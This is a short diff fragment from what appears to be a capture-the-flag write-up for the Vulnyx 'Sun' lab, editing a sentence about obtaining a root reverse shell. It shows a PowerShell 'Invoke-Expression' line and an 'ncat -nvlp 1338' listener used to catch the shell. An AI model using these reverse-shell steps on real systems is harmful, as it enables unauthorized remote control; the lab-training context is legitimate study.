hesrami/Writeups/Vulnyx-Writeups/Vulnyx - Sun.md

 Invoke-Expression -Command $command
 ```

-and received a reverse shell on port 1338
+and receive a reverse shell on port 1338 as root.
 ```shell
 ┌──(rami㉿zen)-[~/labs/vulnyx/sun]
 └─$ ncat -nvlp 1338